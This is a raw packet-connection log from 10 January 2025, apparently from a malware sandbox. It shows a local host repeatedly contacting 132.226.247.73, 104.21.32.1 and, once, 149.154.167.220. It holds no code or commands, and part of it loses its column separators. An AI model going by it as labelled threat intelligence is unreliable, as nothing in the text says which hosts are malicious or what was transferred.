Jan 10, 2025 23:19:21.408927917 CET | 49756 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:21.413667917 CET | 80 | 49756 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:22.123766899 CET | 80 | 49756 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:22.124989986 CET | 49760 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:22.125076056 CET | 443 | 49760 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:22.125149965 CET | 49760 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:22.125381947 CET | 49760 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:22.125415087 CET | 443 | 49760 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:22.167905092 CET | 49756 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:22.618340969 CET | 443 | 49760 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:22.623908043 CET | 49760 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:22.623991013 CET | 443 | 49760 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:22.777635098 CET | 443 | 49760 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:22.777800083 CET | 443 | 49760 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:22.777896881 CET | 49760 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:22.778455973 CET | 49760 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:22.781810045 CET | 49756 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:22.782550097 CET | 49765 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:22.786838055 CET | 80 | 49756 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:22.786897898 CET | 49756 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:22.787370920 CET | 80 | 49765 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:22.787441015 CET | 49765 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:22.787517071 CET | 49765 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:22.792354107 CET | 80 | 49765 | 132.226.247.73 | 192.168.2.6
                                                                                                              Jan 10, 2025 23:19:23.523907900 CET8049765132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:23.525243044 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:23.525290012 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:23.525377035 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:23.525594950 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:23.525610924 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:23.574170113 CET4976580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.030369997 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.032893896 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.032938957 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.176331997 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.176409960 CET44349771104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.176543951 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.177028894 CET49771443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.180433989 CET4976580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.180994034 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.185513020 CET8049765132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.185581923 CET4976580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.185815096 CET8049777132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.185887098 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.185946941 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:24.190680027 CET8049777132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.873136997 CET8049777132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.874922037 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.874959946 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.875123978 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.875422955 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:24.875432968 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:24.919091940 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.387041092 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.388978004 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:25.389005899 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.534141064 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.534288883 CET44349783104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.534354925 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:25.534833908 CET49783443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:25.538960934 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.539365053 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.543952942 CET8049777132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.544168949 CET8049790132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:25.544363022 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.544445992 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.544930935 CET4977780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:25.549242020 CET8049790132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.244102955 CET8049790132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.245354891 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.245410919 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.245662928 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.245956898 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.245986938 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.292922020 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.708710909 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.710901976 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.710989952 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.879167080 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.879343987 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.879703045 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.880026102 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.884480953 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.885735989 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.889457941 CET8049790132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.889511108 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.890523911 CET8049800132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.890575886 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.890674114 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.895462036 CET8049800132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:27.570959091 CET8049800132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:27.572381973 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:27.572419882 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:27.572496891 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:27.572748899 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:27.572757959 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:27.621057987 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:28.047166109 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.068474054 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:28.068490028 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.190753937 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.190917969 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.191037893 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:28.191560030 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:28.212661028 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:28.217659950 CET8049800132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.217832088 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:28.225470066 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.225505114 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.225636959 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.226231098 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.226243973 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.876218081 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.876295090 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.880736113 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.880759954 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.881172895 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.882560968 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.927331924 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:29.119581938 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:29.119668961 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:29.119931936 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:29.125955105 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:31.127842903 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:31.132822990 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:31.132956028 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:31.133126020 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:31.137907982 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:31.804013014 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:31.807331085 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:31.812174082 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.016213894 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.048552036 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.048655987 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.048747063 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.052582026 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.052618027 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.058578968 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:32.547471046 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.547545910 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.549191952 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.549222946 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.549706936 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.589828968 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.594505072 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.635337114 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.709820032 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.709901094 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.709995985 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.712992907 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.716073990 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:32.720952988 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.949526072 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.953133106 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.953203917 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.953299999 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.953644991 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.953671932 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.996110916 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.438858032 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.440267086 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:33.440331936 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.598932981 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.599015951 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.599083900 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:33.599504948 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:33.602669001 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.603760958 CET4984580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.607641935 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.608593941 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.608649969 CET8049845132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.608731031 CET4984580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.608896017 CET4984580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.613681078 CET8049845132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.301940918 CET8049845132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.303122044 CET49851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:34.303150892 CET44349851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.303231955 CET49851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:34.303612947 CET49851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:34.303627968 CET44349851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.355464935 CET4984580192.168.2.6132.226.247.73
Jan 10, 2025 23:19:34.766153097 CET | 443 | 49851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:34.767688036 CET | 49851 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:34.767718077 CET | 443 | 49851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:34.911021948 CET | 443 | 49851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:34.911222935 CET | 443 | 49851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:34.911417007 CET | 49851 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:34.911616087 CET | 49851 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:34.916270018 CET | 49856 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:34.921092987 CET | 80 | 49856 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:34.921267986 CET | 49856 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:34.921372890 CET | 49856 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:34.926115036 CET | 80 | 49856 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:35.617870092 CET | 80 | 49856 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:35.619158983 CET | 49862 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:35.619225979 CET | 443 | 49862 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:35.619359970 CET | 49862 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:35.619589090 CET | 49862 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:35.619622946 CET | 443 | 49862 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:35.668001890 CET | 49856 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:36.094206095 CET | 443 | 49862 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:36.096353054 CET | 49862 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:36.096385956 CET | 443 | 49862 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:36.256346941 CET | 443 | 49862 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:36.256427050 CET | 443 | 49862 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:36.256660938 CET | 49862 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:36.256910086 CET | 49862 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:36.260040998 CET | 49856 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:36.261147022 CET | 49868 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:36.264954090 CET | 80 | 49856 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:36.265161037 CET | 49856 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:36.265984058 CET | 80 | 49868 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:36.266052008 CET | 49868 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:36.266180992 CET | 49868 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:36.270935059 CET | 80 | 49868 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:36.947066069 CET | 80 | 49868 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:36.948384047 CET | 49872 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:36.948407888 CET | 443 | 49872 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:36.948472977 CET | 49872 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:36.948724985 CET | 49872 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:36.948735952 CET | 443 | 49872 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:36.996078968 CET | 49868 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:37.421818018 CET | 443 | 49872 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:37.423290968 CET | 49872 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:37.423340082 CET | 443 | 49872 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:37.568108082 CET | 443 | 49872 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:37.568192005 CET | 443 | 49872 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:37.568279982 CET | 49872 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:37.568974972 CET | 49872 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:37.572149992 CET | 49868 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:37.573182106 CET | 49877 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:37.577334881 CET | 80 | 49868 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:37.577399015 CET | 49868 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:37.577944994 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:37.578015089 CET | 49877 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:37.578123093 CET | 49877 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:37.582890987 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:38.259926081 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:38.261353970 CET | 49882 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:38.261404037 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:38.261487007 CET | 49882 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:38.261780024 CET | 49882 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:38.261795998 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:38.308726072 CET | 49877 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:38.727926016 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:38.729399920 CET | 49882 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:38.729429007 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:38.885452986 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:38.885615110 CET | 443 | 49882 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:38.885703087 CET | 49882 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:38.886117935 CET | 49882 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:38.889339924 CET | 49877 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:38.889960051 CET | 49888 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:38.894393921 CET | 80 | 49877 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:38.894809008 CET | 80 | 49888 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:38.894886971 CET | 49877 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:38.894922018 CET | 49888 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:38.895000935 CET | 49888 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:38.899789095 CET | 80 | 49888 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:39.574192047 CET | 80 | 49888 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:39.575193882 CET | 49893 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:39.575236082 CET | 443 | 49893 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:39.575294971 CET | 49893 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:39.575542927 CET | 49893 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:39.575557947 CET | 443 | 49893 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:39.619004011 CET | 49888 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:39.863255978 CET | 61842 | 53 | 192.168.2.6 | 162.159.36.2
Jan 10, 2025 23:19:39.868108034 CET | 53 | 61842 | 162.159.36.2 | 192.168.2.6
Jan 10, 2025 23:19:39.868226051 CET | 61842 | 53 | 192.168.2.6 | 162.159.36.2
Jan 10, 2025 23:19:39.873106956 CET | 53 | 61842 | 162.159.36.2 | 192.168.2.6
Jan 10, 2025 23:19:40.041199923 CET | 443 | 49893 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:40.042757988 CET | 49893 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:40.042803049 CET | 443 | 49893 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:40.191893101 CET | 443 | 49893 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:40.191984892 CET | 443 | 49893 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:40.192042112 CET | 49893 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:40.192442894 CET | 49893 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:40.195264101 CET | 49888 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:40.196197987 CET | 61846 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:40.200207949 CET | 80 | 49888 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:40.200277090 CET | 49888 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:40.200958014 CET | 80 | 61846 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:40.201037884 CET | 61846 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:40.201100111 CET | 61846 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:40.205826998 CET | 80 | 61846 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:40.331340075 CET | 61842 | 53 | 192.168.2.6 | 162.159.36.2
Jan 10, 2025 23:19:40.336688995 CET | 53 | 61842 | 162.159.36.2 | 192.168.2.6
Jan 10, 2025 23:19:40.337215900 CET | 61842 | 53 | 192.168.2.6 | 162.159.36.2
Jan 10, 2025 23:19:40.899538040 CET | 80 | 61846 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:40.900893927 CET | 61851 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:40.900942087 CET | 443 | 61851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:40.901034117 CET | 61851 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:40.901269913 CET | 61851 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:40.901282072 CET | 443 | 61851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:40.949203968 CET | 61846 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:41.367234945 CET | 443 | 61851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:41.368753910 CET | 61851 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:41.368787050 CET | 443 | 61851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:41.502340078 CET | 443 | 61851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:41.502388954 CET | 443 | 61851 | 104.21.32.1 | 192.168.2.6
Jan 10, 2025 23:19:41.502545118 CET | 61851 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:41.502810955 CET | 61851 | 443 | 192.168.2.6 | 104.21.32.1
Jan 10, 2025 23:19:41.505080938 CET | 61846 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:41.506069899 CET | 61858 | 80 | 192.168.2.6 | 132.226.247.73
Jan 10, 2025 23:19:41.510046005 CET | 80 | 61846 | 132.226.247.73 | 192.168.2.6
Jan 10, 2025 23:19:41.510104895 CET | 61846 | 80 | 192.168.2.6 | 132.226.247.73
